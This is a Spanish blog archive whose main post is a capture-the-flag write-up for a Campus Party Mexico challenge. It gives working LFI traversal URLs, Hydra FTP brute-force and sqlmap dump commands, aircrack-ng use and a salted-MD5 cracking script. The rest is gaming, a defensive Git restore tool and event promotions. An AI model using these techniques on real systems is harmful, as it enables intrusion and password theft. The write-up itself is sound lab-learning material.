Archivo de la etiqueta: campus party

Solución al reto Capture The Flag de #CPMX6

dc-flag

Otro año, otro campus party al que asisto. En esta ocasión me di tiempo de asistir a varias conferencias y workshops que se impartieron durante el evento (y no solo pasármela en la zona gamer :p), además, al igual que en el evento pasado también estuve participando en el reto de seguridad que fue organizado por el Instituto Tecnológico Superior de Atlixco.

El wargame estuvo muy divertido (horas y horas de diversión) y me ayudo a conocer a mas colegas de la seguridad informática durante el evento, bueno sin mas preámbulo comienzo a explicar en que consistía cada uno de los retos y como fue que llegue a la solución.

Reto #1

Comenzando con lo básico, en el reto uno nos daban la IP donde había alojada una pagina web, la pagina tenia varias pestañas y la URL de cada una de las secciones tenia una estructura como la siguiente:

http://52.11.240.182/index.php?file=contacto.html

Jugando un poco con el parámetro file vemos que el sitio tiene una vulnerabilidad de Local File Inclusión. Utilizando la herramienta que desarrollo mi amigo @lightOS para explotar este tipo de vulnerabilidad https://github.com/lightos/Panoptic es posible automatizar el proceso y obtener archivos importantes del servidor, por ejemplo:

http://52.11.240.182/index.php?file=../../../../../../../../../../etc/apache2/envvars
http://52.11.240.182/index.php?file=../../../../../../../../../../etc/logrotate.d/apache2

ctf_cpmx_1

Sin embargo, el reto es mas sencillo que eso, en el archivo robots.txt (corrimos un dirbuster al sitio web) vimos que hay un archivo llamado dir.txt, revisando su contenido nos encontramos:

$ ls -l
html/
secreto.txt

secreto.txt, un archivo interesante, entonces aprovechamos el Local File Inclusion que teníamos y cargamos este archivo.

http://52.11.240.182/index.php?file=../secreto.txt

ctf_cpmx_2

67d71184adf4b700d5cadce0c9bfdcc7e91d01cb <- esta es la bandera del reto 🙂

Reto #2

El segundo reto nos daba como pista “DNS record types” junto con un dominio gcs-ibero.com, si es la primera vez que escuchan de record types en el siguiente enlace podrán encontrar mas información https://en.wikipedia.org/wiki/List_of_DNS_record_types

Entendiendo un poco mas sobre el tema comenzamos a hacer lookup a los distintos records hasta que llegamos al record TXT http://mxtoolbox.com/TXTLookup.aspx y encontramos la solución.

ctf_cpmx_3

4db055f7386c6bb8a14b5883417a4b61 <- es la bandera de este reto

Reto #3

El reto numero 3 es bastante interesante, al inicio nos dan una captura de paquetes, un archivo .pcapng que procedemos a visualizar con wireshark (si no han escuchado de el o no saben utilizarlo ahora es el momento https://www.wireshark.org/)

ctf_cpmx_4

Como podemos observar hay partes de la lectura que están cifradas (ahí se ve una negociación TLS), por suerte entre los archivos que nos daban también venia una llave privada (llave.pem) que nos servirá para descifrar esas partes. En Wireshark nos vamos al menú Edit > Preferences y en la siguiente ventana del lado derecho seleccionamos Protocol > SSL

ctf_cpmx_5

Damos clic en RSA keys list y agregamos una nueva llave, nos pedirá algunos datos como dirección IP, puerto, protocolo y la llave privada (llave.pem), haciendo un análisis de lo que teníamos anteriormente:

En la captura tenemos dos direcciones IP:

  • 192.168.15.7 (dirección local)
  • 52.27.174.204 (dirección remota a la que nos estamos comunicando)

De igual forma, viendo la captura, sabemos que la comunicación con la maquina remota fue atreves de ftp utilizando el puerto 21 (por default) por lo tanto escribimos esos datos y adjuntamos la llave privada como se muestra en la siguiente imagen.

ctf_cpmx_6

ctf_cpmx_7

Damos ok a las ventanas y Wireshark nos debería de mostrar el trafico descifrado. Para analizar mas rápido vamos a pasar la captura a un archivo de texto, File > Print. Seleccionamos Plaint Text y Output to file.

ctf_cpmx_8

Abrimos el archivo generado con nuestro editor de texto favorito y empezamos a buscar por cadenas interesantes como password, pass, secret, etc

ctf_cpmx_9

La bandera de este reto es: ZXASDF727fa2raSFP!FRA-,aSF

Reto #4

El reto cuatro era facil y consistía en un reto criptográfico, al principio nos daban una cadena de texto que parecía no tener sentido y en mi experiencia la mayoría de los retos de este tipo son cifrados caesar. Con la ayuda de google buscamos un sitio para resolver este tipo de cifrados de sustitución por desplazamiento http://www.xarg.org/tools/caesar-cipher/

Introducimos el texto cifrado y obtenemos la respuesta 🙂

ctf_cpmx_10

Mas sabe el diablo por viejo que por diablo <- esta es la bandera del reto

Reto #5

Tip: la bandera es el md5 del contenido del archivo zip.

El reto nos da un archivo comprimido en formato zip, que tiene la particularidad que al descomprimirlo nos genera otro archivo zip, y después otro y otro mas, parecería nunca acabar, lo primero que hice fue abrir el archivo con un editor hexadecimal solo para corroborar lo que ya sabíamos.

ctf_cpmx_11

Del lado derecho podemos ver los nombres de los archivos que se van generado: 617.zip, 293.zip, 558.zip, 689.zip, etc. (son bastantes) así que lo mas fácil es realizar un script para descomprimir todo lo que haya que descomprimir recursivamente xd, yo utilice un comando en bash.

$ while [ "`find . -type f -name '*.zip' | wc -l`" -gt 0 ]; do find -type f -name "*.zip" -exec unzip -- '{}' \; -exec rm -- '{}' \;; done

ctf_cpmx_11
Al final del ultimo Zip nos encontramos con un archivo de texto llamado flag.txt, calculamos su hash md5 y obtenemos la bandera 🙂

$ md5sum flag.txt
da44354d0de702b12934235a51094813 flag.txt

da44354d0de702b12934235a51094813 <- es la bandera del reto (el hash)

Reto #6

El reto 6 nos dio bastante dolor de cabeza a los participantes, a pesar de que su solución era bastante sencilla, en el reto nos daban una dirección IP y se nos pedía utilizar nmap https://nmap.org/ (para escaneo de puertos y servicios) y Hydra para realizar ataques de fuerza bruta, hubo bastante confusión puesto que a aparentemente el servidor solo tenia corriendo un servicio de ssh y fue lo que intente atacar.

El servidor ssh no soportaba autenticación mediante usuario y contraseña por lo que termine creando script en bash, python, etc y probando diferentes tipos de exploits sin éxito :(. Me di cuenta que el primer escaneo que realice no fue un barrido completo de puertos, así que volví a escanear nuevamente esta vez asegurándome de revisar todos los puertos.

$ nmap –sV –p- --version-all --max-retries 1–d IP
...
...
333/tcp open ftp vsftpd 2.0.8 or later
...
...
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Fri Jul 24 18:08:31 2015 -- 1 IP address (1 host up) scanned in 6.26 seconds

Y ahora si encontramos que en el puerto 333 había un servidor de ftp corriendo.
Empezamos a analizar el servicio, tratamos de conectarnos y vemos como responde.

Intentando conectarse con el usuario admin

$ ftp admin @ 52.26.250.230 333
Connected to 52.26.250.230.
220 Welcome to FTP service.
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.

Intentando conectarse con el usuario root

$ ftp root @ 52.26.250.230 333
Connected to 52.26.250.230.
220 Welcome to FTP service.
530 Permission denied.
ftp: Login failed
ftp> exit
221 Goodbye.

El usuario admin parece ser valido (vean como las respuestas son diferentes), pero no tenemos la contraseña, utilizaremos hydra y un buen diccionario, al final y después de un par de horas obtuvimos la contraseña 🙂

$ hydra -t 1 -l admin -P default_pass_for_services_unhash.txt -vV -s 333 52.26.250.230 ftp

ctf_cpmx_12

La bandera de esto reto era x.x: 12345678 (máximum trolling)

Reto #7

Otro reto bastante sencillo, aquí nos dan una foto y se nos pide encontrar la marca del dispositivo con el que fue tomado la fotografía.

Utilizamos cualquier extractor de metadatos online http://regex.info/exif.cgi y obtenemos que la foto fue tomada con una dispositivo Huawei

ctf_cpmx_13

La bandera del reto es: Huawei

Reto #8

En el reto 8 nos dan un archivo .iv que podemos crackear utilizando aircrack-ng, para quien no sepa aircrack es un software incluido en la distribución de seguridad Kali que sirve para crackear redes inalámbricas http://www.aircrack-ng.org/

En nuestro kali utilizamos aircrack-ng para procesar el archivo .iv del reto:

$ aircrack-ng captura.iv

ctf_cpmx_14

Y obtenemos la contraseña de la red inalámbrica que también es la solución al reto
12345 <- es la bandera de este reto

Reto #9

El ultimo reto del capture the flag consistía en explotar una vulnerabilidad de inyección SQL y obtener la contraseña en texto plano del administrador del sitio. El reto, al inicio nos presenta un sitio web con un catalogo de películas, podemos consultar las películas de un director en especifico con una URL similar a la siguiente:

http://54.68.213.190/busqueda.php?idDirector=1

Esta claro que si queremos inyectar comandos SQL tendremos que empezar por el parámetro idDirector y para hacerlo de una forma mas rápida y automática utilizaremos la herramienta sqlmap http://sqlmap.org/ que viene instalada en nuestro Kali.

$ sqlmap --url=http://54.68.213.190/busqueda.php?idDirector=1 --level=1 --risk=3 --all

ctf_cpmx_15

La herramienta nos hace un dump de la tabla de usuarios y vemos que los passwords son almacenados no en texto plano sino cifrados (probablemente en md5), también observamos que la tabla contiene un campo de salt y un valor que muy seguramente fue utilizado para calcular el hash de la contraseña.

Pues manos a la obra (o mas bien dicho, al teclado), el reto nos pide encontrar la contraseña del usuario maria (que es el administrador del sitio), podemos hacer rápidamente un script para intentar crackear el hash.

<?php 
$salt = "WDUOPALD6N";
$hash = "fa38084963f74741ea1184963fa2cd91";

$handle = fopen("pass2.txt", "r");
if ($handle) {
    while (($line = fgets($handle)) !== false) {
    	
    	$line = str_replace("\n", "", $line);

		if(md5($salt.$line) == $hash || md5($line.$salt) == $hash)
		{
			echo $line . " OK! \n";
			exit(); 
		} else {
			echo $line . ":" . md5($salt.$line) . " Nop\n";
		}   
    }

    fclose($handle);
} else {
    echo "file error \n";
} 

?>

Lo que hace nuestro script es, con la ayuda de un diccionario de 2 millones de contraseñas populares, intentar encontrar cual es el texto plano concatenado al valor salt del hash que obtenemos, para cada contraseña de nuestro diccionario calculamos

  • salt + contraseña = hash
  • Contraseña + salt = hash

Y revisamos si tenemos alguna coincidencia.

ctf_cpmx_16

Afortunadamente la contraseña en texto plano se encontraba en nuestro diccionario y la pudimos encontrar 🙂

La bandera del reto final era: passw0rd1 (era la contraseña numero 795975 en nuestro diccionario)

ctf_cpmx_17

Nos vemos el siguiente año.
Happy hacking 🙂

#FelizDiaGamer Lo que he jugado este año

#DiaGamer #FelizDiaGamer #DiaDelGamer
Hoy me entere que existe el día del Gamer (de alguna forma no me sorprende), investigando un poco encontré que se lleva celebrando desde 2008 y gracias a una revista española de videojuegos y al apoyo de toda la comunidad gamer :). Ser gamer es algo relativamente nuevo para mi (2 años para acá), ya que en el pasado no tenia una buena maquina donde jugar y mis laptops casi nunca tenían espacio disponible en disco xD, pero eso cambio cuando conseguí una ASUS G750JW, esta maquina al menos en el momento que estoy escribiendo, puede correr todos los juegos de gama alta :). Teniendo ahora una computadora en donde puedo jugar “de todo” por fin pude probar todos esos juegos de steam que acumule durante los veranos y que nunca pude jugar por mi “deficit” de hardware xD. Pero bueno mi intención en este post es compartir algunos de los juegos con los que me he divertido / frustrado / enojado / llorado en este ultimo año xD.

La saga Call of Duty aka CoD

Call-of-Duty-Black-Ops-Multiplayer-Reveal-Hands-On

Call of Duty, indudablemente un shooter multiplayer que recuerdo con una sonrisa en mi rostro, este juego es muy especial para mi ya que en algún momento de mi carrera, en la universidad donde estudio, se convirtió en el juego predilecto para la gente de sistemas, CoD fue un juego que ayudo a romper el hielo entre los estudiantes veteranos y los de nuevo ingreso, ayudo a crecer el circulo social y a formar lazos de amistad (y aveces de desprecio hacia aquellos que cobardemente usaban Grenade Launcher aka tubo xD), asi que una de las primeras cosas que hice al tener mi laptop de gaming fue instalar y jugar Call of Duty, era hermoso, a diferencia de mi antiguo “cacharro” ahora podía tirar y que me tiraran granadas de humo sin que el juego crasheara o los frames se bajaran entre 5-10, las armas parecían mas realistas y el juego definitivamente te hacia sentir en un campo de batalla :).

MOBAS: League of Legends y Dota 2

league_of_legends_header

Por alguna razón los mobas (Multiplayer online battle arena) son un tipo de juego bastante adictivo para mi, inclusive hubo una epoca en donde los jugaba todos los dias. Dota 2 lo jugue por que la mayoría de mis amigos parecían venir de una larga estirpe de doteros (dota 1) en mi ciudad, entonces les gustaba bastante ese juego, por otra parte League of Legends se convirtió rápidamente en mi moba favorito, los personajes, sus mecánicas y habilidades me agradaron bastante e incluso hoy en día lo sigo jugando de vez en cuanto, LoL es un juego que en lo personal aprendí a amar y odiar al mismo tiempo, me ha hecho reír, maldecir, llorar y frustrarme xD. La gente que frecuenta estos juegos entenderá el por que :p.

Este es Lee sin, mi personaje favorito de league of legends

Dark Souls

league_of_legends_header

En un intento por ser un poco menos casual (what r u casul?) en cuanto al gaming un amigo me introdujo en el mundo de dark souls, solo diré que es uno de los mejores juegos que he jugado en mi vida gamer, el concepto de un juego extremadamente difícil así como la historia del mismo resulto bastante interesante para mi y me engancho, como muchos otros morí incontables veces en el juego pero al final logre terminarlo (dark souls 1, ahora estoy comenzando con el 2 xD) y fue una gran satisfacción.

league_of_legends_header

Survival Horror: DayZ e Infestation

tumblr_mqxpuoeFrJ1rd90z0o1_1280
Los juegos de Survival Horror por si solos son buenos, pero si además le agregas interacción con otras personas en línea creas una experiencia totalmente diferente y difícil de describir, es el caso de juegos como Dayz o Infestation donde juegas en un mundo poblado de zombis y tienes que abrirte paso en las diferentes ciudades recolectando recursos (comida, armas, municiones) o cualquier otra cosa que te pueda llegar a servir, el verdadero problema aqui no son los zombis sino los demás jugadores humanos xD, si hay algo que aprendes después de jugar DayZ, es que no puedes confiar en nadie que no conozcas físicamente en el mundo real, en nadie!!!, Pareciera pues que DayZ e Infestation son juegos diseñados para que las personas demuestren su verdadera naturaleza humana xD, muchas veces con mis amigos llegamos a capturar prisioneros humanos y obligarlos a comer comida podrida en el juego o cosas así, por diversión xD.

Fighters: Mortal Kombat, Street Fighter y SkullGirls

Mortal_Kombat_3

Los juegos de peleas siempre son una buena opción a la hora de divertirnos entre amigos, son juegos rápidos que permiten que todo mundo tenga oportunidad de jugar, Mortal Kombat, Street Fighter y SkullGirl son de mis favoritos en mi repertorio de Steam, aunque en lo personal soy muy malo en SkullGirls en Mortal Kombat he aprendido a dominar a 3 personajes con los que casi siempre gano y logre terminar el juego en la maxima dificultad.

MMORPG: World of Warcraft y Tera

south_park_wow

Aun que no lo crean hubo una época en donde jugué bastantes MMORPG, World of Warcraft, Ragnarok, Tibia, LOTRO (Lord Of The Rings Online), etc. Los MMORPG son juegos bastante adictivos y mas si los juegas con amigos, te puedes llegar a meter bastante en el personaje lo que lo hace aun mas divertido 🙂 en lo personal World of Warcraft me hizo ver que hay toda una economia que gira detras de ese juego, cuando uno esta metido mucho en ese mundo no es raro encontrar sitios en Internet donde contratan gente (la mayoría chinos) para que farmen (conseguir) oro 24/7, el cual es vendido después por dinero real, incluso existen divisas y tazas de cambio entre dólares y oro xD, por la parte de programación solo diré que WoW me hizo adentrarme en el mundo del scripting con LUA, programe un par de plugins que me ayudaban a jugar de forma mas eficiente (así lo veo yo), después de jugar WoW estuve jugando un rato Tera con uno de mis mejores amigos de la universidad @the_kiq, trolleabamos bastante y conseguíamos cosas gratis por que teníamos personajes femeninos xD.

Arcade: OSU!

OSU!, mi juego casual favorito xD, incluso dedique una entrada en este blog para hablar un poco sobre el. OSU! es el tetris del mouse, me refiero es que es de esos juegos que te permiten jugar y no pensar en nada mas, solo existes tu y el juego, pone tu mente en blanco y te ayuda a relajarte. La comunidad de OSU! es gigantesca y muy amigable, tiene beatmaps para todos los gustos musicales, OSU! es definitivamente un juego que nunca te aburrirá.

Voy a parar aquí por ahora, por que si publicara todo lo que he jugado nunca acabaría xD, mejor tratare de disfrutar el #DiaGamer
salu2

Git Hack Recovery

En esta ocasión quiero compartir con ustedes una pequeña herramienta que desarrolle (y lo sigo haciendo) y que presente en #CPMX5 como parte de las charlas dadas por miembros de la Comunidad Underground de México, la herramienta se llama Git Hack Recovery y a grandes rasgos permite que en el caso de que tu sitio web haya sido comprometido por un atacante, los archivos regresen al último estado de confianza de manera automática, ahora explico un poco más.

1487876_10203003583025374_7182323267010208382_o

Montando el entorno

Para empezar tenemos dos opciones, montar nuestro propio servidor con git o utilizar el servicio de algún tercero que permita crear repositorios privados, para este ejemplo Bitbucket es una buena opción puesto que nos permite crear repositorios ilimitados. (https://bitbucket.org/repo/create)

bitbucket

Después debemos de crear 2 cuentas y agregarlas al repositorio, un administrador del con permisos de lectura y escritura y “esclavo” que solo será capaz de leer los archivos del repositorio pero no subir ni modificar nada. (para agregar usuarios al repositorio debes ir a settings > access management)

bitbucket2

Después para mayor comodidad vamos a utilizar pki authentication por lo que debemos crear nuestras respectivas ssh keys en cada maquina (el servidor de producción y la máquina de desarrollo / administración), tutorial: https://help.github.com/articles/generating-ssh-keys
Recapitulando debemos de tener:

  • Repositorio privado
  • Una cuenta con acceso de escritura y lectura al repositorio
  • Una cuenta con acceso de solo lectura al repositorio

Ahora con las tres cosas que tenemos debemos montar una infraestructura como la siguiente:

git-hack-recovery

Tip: En el caso de que nuestro sitio web utilice urls amigables como wordpress, es recomendable que en nuestro servidor de desarrollo utilicemos virtual-host y agreguemos una entrada con el dominio del sitio web que apunte a 127.0.0.1 en nuestro archivo hosts, esto porque algunas veces CMS como wordpress causan problemas con las urls.

Explicación de los Scripts

Esta primera versión de la herramienta está conformada por 5 scripts que se supone deben de correr en segundo background en el servidor de producción, los he separado en dos grupos para que sean más fácil de explicar.

Scripts de administración
Deben de correr en nuestro “trusted system”

  • auto_commit.sh: Como su nombre lo indica, hace un commit, es util a la hora de que terminamos de agregar algo en localhost y queremos que los cambios sean agregados al repositorio
  • db_checksum_backup.sh: En el caso de que nuestro desarrollo utilice bases de datos con este script podemos crear un backup de las tablas y almacenar el checksum de las mismas en un archivo para que posteriormente sean revisadas

Scripts de producción
Deben de correr en nuestro servidor de producción

  • auto_update.sh: Como su nombre lo indica, el trabajo de este script es revisar si hay nuevos cambios en el servidor Git, si los hay los descargara con el fin de mantener el sitio de producción actualizado
  • deface_recovery.sh: Este script se encarga de detectar cambios en los archivos locales, en el caso de que se elimine, modifique o cree un archivo, el script devolverá todo a como estaba originalmente
  • db_checksum_validator.sh: En el caso de que un atacante haya comprometido nuestra base de datos (agregado, eliminado o modificado información de la misma), este script detectara que hubo una modificación de las tablas utilizando el checksum y las restaurara utilizando la copia que tiene del servidor Git
Tip: Es recomendable que los script de producción corran mediante cronjobs mientras que los de administración sean bajo demanda

Integrar los scripts con un proyecto

Primeramente, en nuestra laptop o la máquina de donde subiremos los cambios (normalmente localhost) clonaremos el repositorio usando la cuenta de administrador, y agregaremos los archivos de nuestro sitio web, blog de wordpress, joomla, desarrollo a la medida o lo que sea, después para integrar Git Hack Recovery es tan fácil como descargar los archivos del siguiente enlace Git Hack Recovery y colocarlos junto con los archivos del sitio web que queremos proteger, el archivo .gitignore ya contiene las entradas para que los scripts de administración sean ignorados al momento de hacer los commits. Una vez tenemos los archivos listos en la maquina “trusted” podemos correr los scripts de administración (en este orden)

$ ./db_checksum_backup.sh host-name db-name db-user db-pass
$ ./auto_commit.sh remote-name branch-name "your-commit-message"

En este punto tanto nuestro sistema “trusted” como nuestro servidor Git estarán sincronizados con los mismos archivos, ahora en el servidor de producción vamos a clonar el repositorio de Git utilizando la cuenta “esclavo”, esto nos asegura que en caso de que alguien vulnere el servidor de producción (que es el que normalmente está expuesto a Internet), solo seguirá teniendo acceso de lectura al repositorio en el servidor Git. En el servidor de producción es donde debemos de correr los 3 scripts que nos faltan como taras cron, para hacerlo podemos abrir el archivo de configuración de cronjobs usando el comando:

# crontab -e

Y agregar las siguientes entradas

*/1 * * * * cd /path/production-repository/; /bin/bash deface_recovery.sh --arguments > /path/deface_recovery.txt</li>
*/1 * * * * cd /path/production-repository/; /bin/bash auto_update.sh --arguments > /path/auto_update.txt</li>
*/1 * * * * cd /path/production-repository/; /bin/bash db_checksum_validator.sh --arguments > /path/db_checksum_validator.txt</li>

Estos scripts se estarán ejecutando cada minuto y guardaran un log en el path que le indiquemos. Listo, esto ha sido un pequeño tutorial de cómo integrar la herramienta, es la versión 1.0 pero cumple con su cometido, estaré trabajando para agregarle funcionalidades extras así como soporte para manejar más motores de bases de datos. Próximamente estaré subido algunos vídeos de donde se aprecie el funcionamiento de la misma.

Git Hack Recovery en acción

Descargar Git Hack Recovery

salu2

50% de descuento para Campus Party 2014!

cover2

Uno de los eventos más importantes de Tecnología y ambiente tecnológico del mundo se celebrará en nuestro país en Zapopan, hablamos de CPMX5 y hoy te mostraremos la oportunidad de como obtener tus entradas con el 50 de descuento.

  • Deben registrarse como campusero en www.campus-party.com.mx.
  • Si ya tienes usuario solo debes hacer login.
  • Una vez hecho login en el panel de usuario deben seleccionar la opción «Comprar entrada». (http://www.campus-party.com.mx/webapp/fichaUsuario/pago)
  • Elegir la opción «Comprar con descuento».
  • En el proceso deben usar el siguiente código de descuento: CD501ihw35hi (copia y pega).
  • Una vez elegido el tipo de entrada se procede al pago de la cantidad vía PayPal.

¡Y listo! solo faltaría esperar a que llegue el día de comienzo de #CPMX5 para disfrutar de una semana de contenidos para los fans de la tecnología y lo que esto implica.

FI-WARE lanza dos nuevos retos de apps

478x233 genericos_es
Más de 340.000€ en premios para aplicaciones sociales y de temática libre

El mayor concurso en la historia de la Comisión Europea y Campus Party

La primera convocatoria repartió más de 400.000€ entre los finalistas y ganadores de los dos primeros retos de desarrollo: Smart Cities y Smart Business & Industry.

Ahora, FI-WARE lanza dos nuevos retos: Smart Society y FI-WARE Excellence.
El objetivo del reto Smart Society, con 200.000€ en premios, es promover iniciativas innovadoras que conlleven beneficios para la sociedad desde diversos ámbitos (educación, salud, inclusión social, etc). En el caso del reto FI-WARE Excellence, que repartirá 141.000€, se premiará la excelencia de aquellas apps que hagan uso de la tecnología FI-WARE. Se trata de un desafío para desarrollar aplicaciones, de temática libre, con el único requisito de que su implementación esté basada en la plataforma FI-WARE.

Sobre FI-WARE

La Comisión Europea y las principales empresas TIC europeas emprendieron en 2011 un ambicioso programa de Colaboración Público-Privada con el objetivo de definir una plataforma que represente una opción realmente abierta para el desarrollo y despliegue global de aplicaciones en la Internet del Futuro. Las especificaciones de las APIs (Application Programming Interfaces) ofrecidas por los componentes de esta plataforma, denominada FI-WARE, son abiertas y completamente libres de royalties. Por otro lado, dichas especificaciones están respaldadas por implementaciones de referencia en código abierto de los componentes de la plataforma.